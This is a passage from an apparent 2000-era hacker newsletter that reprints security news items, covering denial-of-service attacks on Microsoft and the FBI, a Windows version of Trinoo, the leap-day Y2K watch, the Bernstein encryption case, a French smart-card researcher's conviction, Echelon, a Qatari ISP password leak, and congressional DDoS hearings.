hi-tech industry. President Clinton has realized that, and hired a hacker to advise on the security of the White House," the letter stated. Several messages on the Y2hacK site's bulletin board reiterated support for the conference. "This whole situation could've been avoided had Anat looked at the list of lectures," Cyphunk wrote. "The subjects being covered are very important for system administrators and other 'security professionals'. [I] imagine that what happened was Anat heard the word 'hacker' and started to fume." @HWA 84.0 HNN:Feb 24th:Microsoft Web Sites Attacked ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Microsoft said that it was hit with a syn-flood attack last Tuesday morning. The attack slowed down website responsiveness between 3 and 7 percent. No damage occurred and the no access into Microsoft Systems was gained. (And why is this news? This sort of thing happensall the time.) Reuters - via Excite http://news.excite.com/news/r/000223/20/tech-hackers-microsoft (404) @HWA 85.0 HNN:Feb 24th:�New DDoS Tool Released ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles A new Windows version of Trinoo has been released. This new version will make it much easier to launch distributed denial of service attacks similar to those that recently hit Yahoo, ZDnet, CNN and others. C|Net http://news.cnet.com/category/0-1005-200-1555637.html New hacker software could spread by email By John Borland Staff Writer, CNET News.com February 23, 2000, 4:35 a.m. PT A group of anonymous programmers has released a new version of the software that shut down Yahoo and Amazon.com earlier this month--one that makes it far easier to launch attacks, computer experts say. The tools, a new version of a software package dubbed "Trinoo," could allow attackers to infiltrate ordinary desktop computers though an innocent-looking email attachment. These computers--particularly those connected to high-speed Internet services--could then be used as unwitting accomplices in assaults on other Web sites, security analysts say. "(The previous attacks) took someone who knew what they were doing," Trend Micro spokesman David Perry said. "This turns it into a kid-on-the-street problem." The release of these tools follows some of the highest-profile computer attacks in the Web's history. Using a method dubbed "distributed denial of service attacks," computer vandals successfully rendered Yahoo, Amazon, eBay and a handful of other big Web sites paralyzed for hours at a time by swamping them with a multitude of simultaneous attacks. The attacks have spurred law enforcement investigations around the globe, but the FBI has not reported any major breakthroughs in the case. Some speculation has centered on several individuals with hacker nicknames like "mafiaboy." Canadian authorities investigated an Internet service provider (ISP) last week that once hosted a "mafiaboy" hacker-related site. But Canadian police said today they had no progress to report in their investigation. While no conclusive evidence has been released on exactly what tools were used in the denial of service attacks, recent speculation has focused on tools with names like Trinoo, Tribal Flood Network and Stacheldracht (German for "barbed wire"). These tools allow an attacker to place agents on "zombie" computers around the world and then wake them up simultaneously to launch a crippling stream of Web traffic at a target site. Security officials at the FBI and other computer security agencies have been warning of the danger these tools pose for several months and have provided software to help guard against their use. But the new version of Trinoo heightens the danger because it makes attacks easier to launch. Because the new version can infiltrate Windows NT, Windows 95 and Windows 96-based machines, far more computers are at risk of becoming hosts. The Windows version also allows the tools to be spread as apparently innocuous email attachments, much like ordinary viruses. Computer security experts say they haven't seen this happen yet, but that the Windows platform makes it relatively easy to do. "This does make (denial of service attacks) easier," said Elias Levy, chief technical officer for SecurityFocus.com, a computer security Web site. "Not that it required a lot of intelligence or skill before. But this does bring it down another notch." The new tools are largely a threat to users with always-on digital subscriber line or cable modem connections, analysts said. This kind of threat has been seen before with the Back Orifice software, Levy noted. That package, once surreptitiously installed on a system, allows an outside person to control the computer remotely. The Trinoo package is geared more specifically for launching denial of service attacks, however. Most of the major anti-virus firms have already developed or are developing tools to scan for and remove the new Trinoo software. @HWA 86.0 HNN:Feb 25th:�NDB Hit by Cyber Vandals ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse NDB, an online broker, was cut off for more than an hour yesterday because of what it said was an attack by computer vandals. National Discount Broker Group, based in Jersey City, said that the company had taken precautionary measures in light of recent attacks but that they had clearly not worked. (Hmmmm, not a whole lot of technical information here, who knows what really happened.) New York Times http://www.nytimes.com/library/tech/00/02/biztech/articles/25hack.html (Pay to play..) @HWA 87.0 HNN:Feb 25th:Y2K Leap Day ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench John Koskinen, President Clinton's Year 2000 Czar told reporters that the US and about a dozen other countries will work together to track any automated-system failures sparked by a leap day next week. Leap days occur only once every 400 years. No major system failures are expected. Plans for the future of the state-of-the-art computer facility built for the Y2K rollover have not yet been announced. ZDNet http://www.zdnet.com/zdnn/stories/news/0,4586,2448220,00.html?chkpt=zdnntop Y2K alert ... again? Beware 'leap day' 'A real issue we feel obligated to keep track of,' warns Clinton's Year 2000 technology whiz, as the U.S. and others gear up for possible Feb. 29 digital snafus. By Reuters February 24, 2000 4:13 PM PT The United States and about a dozen countries will work together to track any automated-system failures sparked by a leap day next week that occurs only once in 400 years, the U.S. government said Thursday. "It's a real issue that we feel obligated to keep track of," John Koskinen, President Clinton's chief aide for Year 2000 technology problems, told reporters at a $50 million Y2K monitoring station. Koskinen said he did not expect any major system failures, largely because organizations typically checked for leap-year compliance while troubleshooting for the so-called Y2K bug. "If there are difficulties in many cases it will result in minor or modest glitches that can be remedied quickly if people catch it quickly," he said. To keep tabs internationally, Koskinen will take part in scheduled conference calls every eight hours over a three-day period with national Y2K coordinators on the steering committee of the World Bank-funded International Y2K Cooperation Center. This group includes Britain, Bulgaria, Chile, Gambia, Iceland, Japan, Mexico, Morocco, the Netherlands and South Korea. Australia and New Zealand have also been invited to take part because they can give early warning shortly after Feb. 29 dawns at the international date line. Info center finds new purpose The $50 million information coordination center set up under White House auspices to track Y2K glitches will be operational from Feb. 28 to March 1. It will be staffed from 7 a.m. to 9 p.m. by about 75 federal workers per shift, about half as many as for the century date change, when it ran around the clock. The greatest leap-day risk is to custom software used for record keeping or billing, especially where the number of days is central to the process being carried out, such as computing interest, Koskinen said. Unlike the Y2K issue -- where the use of only two digits to signify the year was standard practice (see ZDNet News' Y2K Special Report) -- the potential leap-year problem results from misunderstanding the rule for when an extra day is added to the calendar. The three-step rule Under the little-known three-step rule, February picks up a 29th day in years divisible by 4 except when the year is divisible by 100 -- unless the year is divisible by 400. Thus, the year 2000 is the first leap year of its kind since 1600. The three-step rule was crafted for the calendar introduced by Pope Gregory XIII in 1582 to better synchronize with the cycle of the seasons. The years 1700, 1800 and 1900 were not leap years. Koskinen said previous testing found that some software programmers knew enough of the leap-year rule to get to its second step. That would mean they could have coded 2000 as a normal year, in which February had 28 days, instead of the 29 required. Koskinen, who chairs the President's Council on Year 2000 Conversion, said he would brief journalists on any glitches at 2 p.m. Feb. 29 and March 1. At the final briefing, he said he would announce White House plans for the future of the state-of-the-art computer systems built for the rollover watch post. @HWA 88.0 HNN:Feb 25th:�Bernstein Allowed to Post Snuffle ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The Commerce Department has confirmed that the new encryption export policy does permit Daniel Bernstein to post his 'Snuffle' program to the web without obtaining an export license. Snuffle is a piece of strong encryption software that has been the subject of a free speech lawsuit. C|Net http://news.cnet.com/news/0-1005-200-1556935.html?tag=st.ne.1002.bgif.1005-200-1556935 Professor allowed to post encryption program online By Reuters Special to CNET News.com February 24, 2000, 11:00 a.m. PT WASHINGTON--The United States will let a computer scientist put instructions for writing a powerful computer data-scrambling program on his Web site, but his high-profile lawsuit challenging U.S. export restrictions on encryption may continue, his lawyer said today. President Clinton in January dramatically liberalized once-strict U.S. export limits on encryption programs, which scramble information and render it unreadable without a password or software "key." The changes recognized that encryption, used in everything from Web browsing software to cellular telephones, has become essential for securing e-commerce and global communications. The move also followed a May 6 decision by a three-judge panel of the U.S. Ninth Circuit Court of Appeals that the old rules barring University of Illinois professor Daniel Bernstein from posting instructions for his "Snuffle" program on the Internet were an unconstitutional violation of the scientist's freedom of speech. But in January, the full court asked the panel to reconsider the ruling in light of the new Clinton policy. In a private advisory letter sent last week, the Commerce Department confirmed that the new encryption export policy permitted Bernstein to post instructions, called source code, for his program on the Internet for all to see. Any other computer programmer could easily compile the source code into a functioning program. "In light of the changes in licensing and review requirements for publicly available source code, the new regulations do not interfere with his planned activities as you have described them," the Commerce Department letter said in response to a letter from Bernstein's lawyer. Under the old rules, Bernstein had to obtain an export license for each person who wanted to view his Web site from outside the United States--an impossible task given the Net's global reach. But the new rules allow anyone to post encryption source code on the Internet as long as they also send a copy to the government and do not charge royalties for use of the code. "We are still considering our options," said Cindy Cohn, Bernstein's lawyer. Cohn said the Commerce Department letter failed to clear up some questions about the new rules. The department did make it clear that a Web site that merely picked up code posted by someone else, a practice known as mirroring, would not be held responsible for following the export rules. And Bernstein or others would not have to notify the government again each time they posted bug fixes or updates. Bernstein's lawsuit came about because under the old rules, a book containing computer source code could be shipped out of the United States without restriction, but the same source code posted on the Internet or put on a floppy disk could not be "exported" without a license. @HWA 89.0 HNN:Feb 26th:FBI Hit with DOS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by hantai and William Knowles The FBI has acknowledged that their web site was hit with a denial of service attack which forced it off line for several hours on the 18th. Unfortunately there are almost no technical details in this article. Associated Press - via San Jose Mercury News http://www.sjmercury.com/svtech/news/breaking/ap/docs/252799l.htm FBI admits its site was attacked BY TED BRIDIS AP Technology Writer WASHINGTON (AP) -- The FBI acknowledged Friday that electronic vandals shut down its own Internet site for hours last week in the same type of attack that disrupted some of the Web's major commercial sites. The bureau's Web site, www.fbi.gov, remained inaccessible for more than three hours Feb. 18 because vandals overwhelmed it by transmitting spurious signals. ``The FBI has made comments they're going to find who's responsible for the latest attacks, so it's a bit of war between the hackers and the bureau,'' said James Williams, a Chicago lawyer and former FBI agent who specialized in investigating computer crimes. The technique, which doesn't require particular sophistication, is similar to repeatedly dialing a phone number to block all other incoming calls. Last year, the FBI pulled down its World Wide Web site for days after hackers overwhelmed it using the same type of attack. No one has claimed responsibility for launching last week's attack against the same law enforcement agency that is investigating serious disruptions earlier this month at Yahoo!, eBay, ETrade, Amazon.Com and others. ``Pretty much anyone is a target,'' agreed John McGowan, a research engineer at ICSA.Net, a computer security firm. He wasn't surprised no one has claimed credit. ``I don't think I'd want to go around bragging that it was my group that shut down the FBI,'' McGowan said. ``They're certainly turning up the carpets and looking for anything they can find.'' The FBI said last week that it couldn't determine whether the problem was a technical fault or malicious attack, but a spokeswoman, Deborah Weierman, confirmed Friday that vandals were responsible. She declined to say whether there was any evidence, other than the coincidence in timing, to link last week's attack against the FBI to those against other Web sites. The FBI noted that its computers weren't broken into, and that its affected Internet site is separate from all its internal systems, including investigative files. ``We have had no more problems since then,'' Weierman said. Engineers at IBM, who run the FBI's Internet site under a federal contract, ``took the appropriate steps to get our Web site back and running (and) continue to look into remedies and actions to minimize this from happening again,'' Weierman said. (PROFILE (CO:Amazon.com Inc; TS:AMZN; IG:RTS;) ) @HWA 90.0 HNN:Feb 26th:Police Monitor 170,000 Pay Phone Calls ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by indie slide This article deals mostly with how a major player inside the Canadian Mafia was tracked down and arrested. The interesting part is the explanation of his arrest in which the police traced his fingerprints from a thrown away prepaid calling card. The article goes on to say how the police monitored the outgoing phone calls from 85 separate pay phones (a total of 170,000 calls) from businesses and malls he was known to visit in order to trap any calls he placed. (That's a lot of calls, wonder how many personal calls were accidentally listened to?) National Post http://www.nationalpost.com/home.asp?f=000226/217309 @HWA 91.0 HNN:Feb 26th:Echelon on 60 Minutes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond An interview with former spy Mike Frost appeared on 60 Minutes Sunday night. The interview covered the NSA's involvement with the global spy netowork known as Echelon. In traditional intelligence agency spin control, the NSA has issued a letter about the show to congress. CBS http://cbsnews.cbs.com/now/section/0%2C1636%2C3415-412%2C00.shtml NSA letter to Congress http://www.fas.org/sgp/news/2000/02/nsalet.html (Contains graphics) check url for article with diagrams. @HWA 92.0 HNN:Feb 26th:French Smart Card Researcher Sentenced ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse Serge Humpich, the 36 year-old engineer who discovered flaws in the chip-based security of French credit cards, has been sentenced to a suspended prison sentence of 10 months, 12,000 francs (approx. 1,200) in fines, and one symbolic franc in damages to the Groupement des Cartes Bancaires. After he had discovered significant flaws in the authentication system of French credit cards he attempted to sell the information to the Banks, who in turn conspired to have him arrested. (Instead of fixing the problem have the guy arrested, great strategy.) The Register UK http://www.theregister.co.uk/000226-000001.html The Liberation - French http://www.liberation.fr/quotidien/semaine/20000226sams.html Register; SATURDAY MARCH 11TH 2000 Posted 26/02/2000 8:41am by Cedric Ingrand French credit card hacker convicted Serge Humpich, the 36 year-old engineer who discovered flaws in the chip-based security of French credit cards, was sentenced yesterday in Paris. Under the ruling issued by the 13th correctional chamber, he was sentenced to a suspended prison sentence of 10 months, 12,000 francs (approx. �1,200) in fines, and one symbolic franc in damages to the Groupement des Cartes Bancaires. His computer equipment has been seized, as well as the document that he had filed with the INPI (France�s patents and trademarks office), detailing his findings. Humpich began studying credit card security four years ago. When he discovered significant flaws in the authentication system, he contacted the Groupement des Cartes Bancaires, through lawyers, to negotiate a "technology transfer" of his discovery, for an undisclosed amount (estimates of up to �20M were never confirmed by either party). During Court hearings held on January 21 it was revealed that Humpich had committed only one fraud (when he bought metro tickets using cards he made), performed at the instigation of the GCB, and using the blank cards that it had supplied. Little did he know that the GCB had already contacted the authorities, and that his phone was tapped. Humpich was later arrested, his equipment seized, and his house (as well as his lawyer�s offices) raided by police. Inventing the 57 franc note "My intention was always to negotiate the results of my invention", Humpich told The Register. "My mistake was dealing with such a formidable opponent. Had I not been duped about their true intentions, no one would have ever heard a word about the whole thing." Convicted for "counterfeiting credit cards", Humpich doesn�t consider his work forgery. "It's just as if I'd designed a perfect 57 francs bill," Humpich smiles. Although his conviction validates his findings in a way, he is quick to correct that the cards he manufactured were not copies of existing cards, but rather spoof cards that could fool point-of-sale terminals (i.e. not hardwired into the banks computers), which would deem the doctored cards valid. Understandably reluctant to go into too much detail, Humpich does acknowledge that the cards he made could have arbitrary numbers, and be used with any four-digit PIN code. At the heart of the case lies the crypto authentication algorithm used by the cards, that relies on a 96 digit key computed from a 321 bit public key. Part of Humpich�s breakthrough was the factoring of that public key. Evidence has come up that the system in use in most cards today was deemed unsafe by experts as far back as 1988. Documents backing the claim have been posted on a website (www.humpich.com) hosted by supporters of Humpich. According to the documents, the 96 digit key standard dates back to the original 1983 design, and was never upgraded to keep up with computing power. Apparently, French banks need a serious refresher course on Moore�s law. Another fine mess Chip cards have been implemented in French credit cards since 1992. In a classic case of security through obscurity, GCB won�t discuss the specifics of credit card security, staunchly defending the official line that "chip cards are the safest around, with tremendous benefits on fraud statistics." However, in a recent interview, the GCB stated that a long, hard low-tech look at the hologram imprinted in the cards, was the best way for a retailer to check a card�s validity. Retrofitting POS terminals to patch up security could cost banks as much as �3 billion, according to some estimates. ATM cash terminals, which only use the data stored on the cards� magnetic stripe for reasons of backwards compatibility with foreign (i.e. chip-less) cards, are not prone to the flaws discovered by Humpich. "Right now, a credit card is about as safe as a Post-It note," Humpich says. "I have proved that their protection can be circumvented, and they have yet to fix the flaws. But that would mean admitting that they were negligent in the first place." When asked if he thinks that others will pick up his work where he left it, Humpich answers that it will be "much easier for them now that all this is into the open. Some are really close to the solution now". Already, anonymous messages on Usenet are providing details on the keys used for credit card authentication. The French credit card safety saga rumbles on, despite the Humpich's conviction. In an open statement, eight French consumer associations demanded that banks provide a full disclosure on credit card safety. The affair could undermine France�s attempts at exporting this chip technology, as well as the prospects of installing cheap card readers on PCs as a mean of authenticating e-commerce transactions. "You know, I didn�t put them in the mess they're in today," Humpich says. His lawyers plan to appeal the conviction. � French; Le justice ne fait pas cr�dit au pirate des cartes bancaires Prison avec sursis et amende, alors qu'il plaidait la bonne foi. Par PASCALE NIVELLE Le samedi 26 et dimanche 27 f�vrier 2000 Le tribunal correctionnel de Paris a condamn� vendredi Serge Humpich, �pirate� des cartes bancaires, � dix mois de prison avec sursis et � verser un franc symbolique au plaignant GIE-CB (Groupement d'int�r�t �conomique cartes bancaires). Un jugement mi-ch�vre, mi-chou, plus cl�ment que les r�quisitions du minist�re public (deux ans avec sursis et 50 000 francs d'amende), mais plus s�v�re que ne l'esp�rait la d�fense, qui avait plaid� farouchement la relaxe, le 21 janvier devant la treizi�me chambre. �Je ne comprends rien � la justice... C'est un jugement d'incitation � la fraude�, a d�clar� l'ing�nieur � la sortie de l'audience. Un s�same. Car il n'a jamais eu l'intention de frauder. En 1997, cet ing�nieur informaticien invente, apr�s quatre ans de recherches dans la soupente de sa ferme de Seine-et-Marne, la formule dont r�vent les hackers (pirates informatiques) du monde entier. Comment violer le syst�me de s�curit� des cartes bancaires: bricoler d'abord une fausse carte, lui attribuer un code illisible et voir afficher �code bon� dans tous les cas. Un s�same pour un cr�dit illimit� dans les distributeurs de billets et les terminaux d'acc�s des 600 000 commer�ants fran�ais adh�rents du GIE-CB. En juillet 1998, il d�pose son �invention� � l'INPI (Institut national de la propri�t� industrielle) sous le label �comment fabriquer une fausse Carte bleue� et contacte le GIE par l'interm�diaire d'un avocat d'affaires et d'un conseil en propri�t� industrielle. Il compte monnayer sa trouvaille et conclure avec eux un �contrat de transmission de savoir-faire�. Le secret contre une forte somme d'argent, pratique courante dans le monde des affaires. �Pour le GIE, conna�tre la faille de son syst�me de s�curit�, c'�tait trouver une nouvelle parade contre la fraude�, explique l'ing�nieur. D'abord incr�dule, le GIE le laisse venir et finit par accepter le march� quand Serge Humpich, en pr�sence d'un huissier, retire dix carnets de tickets de m�tro dans une station parisienne. En fait, le GIE a d�j� port� plainte. En ao�t 1998, Serge Humpich est fil�, plac� sur �coute. En septembre, il est plac� en garde � vue, mis en examen pour �avoir frauduleusement acc�d� au syst�me� et licenci� de son emploi pour faute grave. 500 francs par mois. Amer, il constate: �Je pouvais gagner un peu d'argent honn�tement, beaucoup d'argent malhonn�tement. J'ai eu affaire � des bandits et j'ai tout perdu.� Fin du r�ve. Il vit, depuis, avec 500 francs par mois apr�s cr�dits et imp�ts. Au proc�s, le 21 janvier, l'avocat du GIE a r�clam� �une peine exemplaire� contre �le petit bidouilleur pervers�. Le minist�re public, incluant Serge Humpich dans �la techno-d�linquance�, l'a accus� d'avoir voulu �servir ses int�r�ts personnels par une esp�ce de chantage�, mais a r�clam� cependant une demi-mesure, rappelant que la peine maximale �tait de sept ans pour ce type de d�lit. Le jugement de vendredi confirme la conviction mitig�e des magistrats dans ce dossier. Choqu� par l'encha�nement des �v�nements, tr�s anxieux, Serge Humpich esp�rait la relaxe r�clam�e par ses avocats au nom de l'�honn�tet� de leur client. �Pouss� � la faute�, dit-il, par ceux-l� m�mes qui l'ont accus� de fraude, cet Alsacien fils de mineur, dipl�m� d'une �cole d'ing�nieur de Lyon, ne regrette rien malgr� sa situation actuelle: �J'ai beaucoup appris.� Il reste aussi le seul d�tenteur du secret des cartes bancaires. @HWA 93.0 HNN:Feb 26th:BT Network Crashed, Reason Unknown ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by knobcottage All 0345, 0845, and 0800 numbers on the British Telecom network crashed from 11a.m. on February 26, until early hours of the next day, for 'unknown reasons' say British Telecom. 0345, 0845 numbers are those designated as local call charge numbers and are those used by the service industries and most ISP's. 0800 numbers are free numbers used for promotions. BT is still investigating the cause of the crash. The Guardian Observer http://www.newsunlimited.co.uk/Breaking_News/UK/0,2478,35055,00.html We Don't Know Cause Of Crash, Says Bt From the Press Association Saturday February 26, 2000 11:42 am BT has said it does not know what caused the crash of part of its national network - or if it could happen again. Phone engineers worked through the night to restore the operation of 0800, 0845 and 0345 numbers, which were blocked or engaged from yesterday at 11am. The fault hit calls to the Government's flagship NHS helpline, two motoring rescue organisations, gas companies, banks and rail inquiries. "It is likely the problem was a malfunction in the system than to do with call volumes, but we do not know for absolute certain," a BT spokesman said. "There is an urgent need to establish what happened. We have no indication yet as to what caused this problem, where it started or if it could happen again." Among the worst-affected services were the NHS Helpline, the AA, the RAC, British gas, pipeline operator Transco, National Rail Inquiries, banks, Virgin, the RSPCA, the Samaritans, and some Internet service providers. The problem began when two of the three BT computers handling reduced rate calls and freephone numbers crashed for an unknown reason, triggering a massive logjam. BT said that two main gateways to the network, at Cambridge and Leeds, were affected by the problems, leaving the remaining one in Croydon swamped with calls. The spokesman said: "We will be monitoring the network closely as call volumes increase and work will also continue both to establish the root cause of the incident to ensure that this problem does not recur." The Department of Health confirmed that difficulties getting through to the NHS Direct service were down to BT. The round-the-clock service normally receives around 8,000 calls a day. @HWA 94.0 HNN:Feb 26th:ISP Loses User Names And Passwords ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by mothy The only ISP in the small middle eastern country of Qatar had at least one third of its customer information released to CD and sold on the streets of the capital city of Ad Doha. The ISP, QTel, denied the allegations until the information was made public. Wired http://www.wired.com/news/politics/0,1283,34515,00.html Internet Scandal in Qatar by Jihad Abdullah 3:00 a.m. 24.Feb.2000 PST DUBAI, United Arab Emirates -- Thousands of Qataris have finally discovered why their Internet access bills inexplicably soared like the price of oil in recent weeks: Their usernames and passwords were being sold on CDs. More than 6,000 usernames and their relevant passwords were being sold in the capital city of Ad Doha and other cities for between 500 and 1,000 Qatari riyals (US$137-275) over the past several weeks. Many of the usernames and passwords apparently belonged to corporate accounts of several ministries, major companies, and even the Emiri (Royal) Court. The affected accounts total about one-third of Internet users in Qatar, according to a recent survey by Internet Al Alam Al Arabi magazine. The culprit remains a mystery as finger-pointing runs rampant. Qatar's only ISP, QTel, has admitted a leak, and said it averted continuing problems by launching an email campaign asking subscribers to change their passwords. Qatar's former minister of justice, Najeeb Noaimi, claimed credit for uncovering the scandal in his weekly column in Al Sharq Daily and on national TV. But he said that was only after he was rebuffed in his attempts to communicate the problem with QTel. "I gave a copy of the CD to QTel's GM, but nothing was done," Noaimi said. "Then I warned them and they didn't respond. Now I have to go public and tell the story." Noaimi blames QTel staff members for the security breach, and said the CD focused on large corporations that might not notice discrepancies in their bills. Typical Internet access charges in Qatar amount to the equivalent of US$3 an hour. Some corporations, including the Al Sharq newspaper, did notice the difference. "We used to get a monthly bill of QR3,000 ($820). Suddenly in December, we got a bill of QR15,000," said editor Abdulaziz Almahmoud. "What was strange is that whenever we changed our password, we found it is leaked the next morning." Almahmoud's bill for January was more than QR170,000 ($46,500), which he refused to pay. Individual accounts also were affected. One Qatari reportedly received a bill of QR60,000 (US$16,500) for service in January. Qatari law mandates that the use of an unauthorized account to access the Internet can be charged as a theft crime. QTel, which is owned by the government as well as local and foreign investors, issued a statement on Monday blaming Noaimi for the distribution of the CD. "He is involved in the leakage of this CD to hurt the reputation of QTel, and we will consider a case against him," the statement said. Noaimi said he welcomes such a case so he can expose the truth. He said he was originally given a copy of the CD following a rash of complaints about the sudden rise in access bills. Amahmoud said that according to a threat he received, the newspaper risked losing QTel ads if he published information about the leak. QTel officials were told not to comment on the issue. "We were told not to speak until this thing is over. If I talk to press, I may get fired," one employee said. @HWA 95.0 HNN:Feb 29th:�Senate Hearings on DDoS Attacks Today ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Brian and Ted A hearing will be held today by a Joint Oversight Committee entitled "Internet Denial of Service Attacks and the Federal Response". The hearing will be held today at 2:00pm in room 2141 of the Rayburn House Office Building. Witness List - the last name on this list is rather interesting http://www.senate.gov/~judiciary/wl22920j.htm (Its "mudge" from the l0pht.. ;) -Ed ) Industry Says No New Laws Today's Joint Oversight Hearing regarding the recent DDoS attacks are likely to result in industry leaders asking Congressional members not to pass more laws. Many industry leaders are more concerned about restoring online business quickly than enduring a protracted legal investigation. San Jose Mercury News http://www.sjmercury.com/svtech/news/breaking/ap/docs/260790l.htm Need for hacker laws downplayed BY TED BRIDIS AP Technology Writer WASHINGTON (AP) -- Even amid dramatic attacks by cyber vandals on some of the Internet's flagship Web sites, the nation's technology industry appears reluctant to ask Congress for new or expanded anti-hacker measures. The industry appears to be maintaining its traditional reluctance against inviting government into its affairs, even in its defense against hackers and online vandals. Those sentiments, expected to be delivered to lawmakers at a congressional hearing Tuesday, illustrate the gulf between Washington and the high-tech industry beyond the 2,400 miles physically separating the epicenters of the two cultures. Panels from the House and Senate Judiciary committees organized Tuesday's hearing to determine what changes, if any, they need to make to existing crime laws in the wake of electronic attacks earlier in February that disrupted for hours Web sites run by Yahoo!, Amazon.Com, eBay, ETrade and others. But industry leaders, anxious about an expanded government presence, appear uninterested. Companies are worried about bad publicity or poor consumer confidence if they're identified in court as victims. Many are more concerned about restoring online business quickly than enduring a protracted legal investigation that results in the arrest, for example, of a misguided college student. ``Infrastructure security ... does not lend itself to government management,'' Microsoft's chief information security officer, Howard Schmidt, said in remarks prepared for the hearing. ''... The private sector has the knowledge and expertise to help fight against computer crimes on the infrastructures on which they operate.'' Schmidt warned lawmakers against ``unnecessary outside regulation or interference in the operation of dynamic, very productive businesses.'' The FBI still is trying to trace the origin of the assaults, which used dozens of ``zombie'' computers nationwide where attack software had been implanted and activated by hackers. The technique, called a ``denial of service,'' is similar to programming fax machines to dial a company's telephone number repeatedly to prevent other incoming calls. Rep. Bill McCollum, R-Fla., chairman of the House crime subcommittee, was expected to poll federal authorities and technology executives whether existing laws against hacking -- which typically prohibit breaking into computers -- can be used to prosecute vandals in denial-of-service attacks. In most of the recent attacks, the companies and their Internet providers successfully filtered incoming ``junk'' data within hours to restore service to their Web sites. Yahoo!, for example, indicated that financial losses from the attack weren't serious. ``The technology industry showed that it can respond swiftly and effectively, taking steps to quickly beat back the attacks to make it harder for similar assaults to succeed in the future,'' Charles Giancarlo, a senior vice president for Cisco Systems Inc., said in prepared testimony. Cisco, which makes computer hardware used by many of the major sites, helped stem the attack against the online auction site, eBay Inc. Giancarlo added: ``We do not ask Congress for new laws in the area of Internet security.'' An executive for Amazon.Com Inc., whose Web site fell under attack for more than an hour late Feb. 8, did not identify in his testimony any new laws the FBI might need, although the company said it supports better training and more money for federal agents to become digital detectives. ``Current laws ... appear to provide some prosecutorial authority and have been used successfully in several recent hacking cases,'' Paul Misener, Amazon's vice president for global public policy, said. Congress has already offered to write new laws or change existing ones to protect Internet companies. Sen. Kay Bailey Hutchison, R-Texas, has promised new legislation to double the penalties for hackers to 10 years in prison for a first offense and 20 years for a second offense. Sen. Patrick Leahy, D-Vt., wants to amend federal wiretap laws to make it easier for authorities to trace vandals from the ``zombie'' computers where they implant their attack software. Under current law, agents require a wiretap order to examine data traffic flowing through those computers, even with permission from the machine's owner. Others outside Congress are worried that lawmakers' eagerness to help trace attacks against lucrative technology companies -- which are gradually becoming powerful players in Washington -- could result in draconian surveillance networks. ``It is clear that the private sector is stepping up its security efforts, with an effectiveness that the government could never match,'' said James X. Dempsey of the Center for Democracy and Technology. ''... The potential for the government to help is limited, while the risk of the government doing harm is very high.'' @HWA 96.0 HNN:Feb 29th:NSA and CIA Form Third Secret Agency SCS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond The French newspaper Le Monde has accused the CIA and NSA of creating a third super secret agency named Special Collection Service (SCS). The Le Monde claimed that this organization's role is to defeat various encryption technology to allow interception operations to succeed. Le Monde - French Cryptome - English Translation of Article @HWA 97.0 HNN:Feb 29th:Barr Responds To NSA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Last Sunday's episode of 60 Minutes featuring a spot concerning Echelon prompted the NSA to draft a letter to Congress in an attempt to Spin any possible negative coverage. In response to that letter Representative Bob Barr from Georgia has drafted his own letter. Letter from NSA to Congress http://www.fas.org/sgp/news/2000/02/nsalet.html Letter from Barr to NSA http://cryptome.org/barr-nsa.htm @HWA 98.0 HNN:Feb 29th:Title Email Labeled as Internet Terrorism ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by demetrius clinton There is a rumor floating around the internet that Bananas from Costa Rica carry the "flesh-eating" bacteria called necrotizing fasciitis. While the email rumor is obviously not true it has prompted the Vice President of the International Banana Association (IBA) to label the action as "Internet Terrorism". (I think he should probably look up terrorism in the dictionary.) APB News http://www.apbnews.com/newscenter/internetcrime/2000/02/25/bananas0225_01.html Banana Rumor Called 'Internet Terrorism' E-mail Claims Fruit Spread Flesh-Eating Bacteria Feb. 25, 2000 By David Noack ALEXANDRIA, Va. (APBnews.com) -- The attack of the killer bananas? A trade group says absolutely not and is trying to squelch an Internet rumor that has been circulating by e-mail claiming that bananas from Costa Rica carry the "flesh-eating" bacteria called necrotizing fasciitis. International Banana Association (IBA) Vice President Tim Debus calls the rumor "just another case of Internet terrorism like the recent hacker attacks on popular Web sites." The e-mail, which has been around since late January and is still circulating, purports to come from the Manheim Research Institute of the Center for Disease Control in Atlanta -- home of the real Centers for Disease Control and Prevention (CDC), the respected U.S. government agency. 'Urgent warning' The "urgent warning" claims that necrotizing fasciitis has decimated the monkey population of Costa Rica and that researchers have recently discovered "the disease has been able to graft itself to the skin of fruits in the region, most notably the banana." Readers are warned that the infection can eat "2 to 3 centimeters of flesh an hour" and that amputation is likely and death possible. After warning readers to avoid buying bananas for two to three weeks and advising getting medical help immediately if they develop a fever, the message attempts to cash in on suspicion of government. "The FDA [Food and Drug Administration] has been reluctant to issue a countrywide warning because of fear of 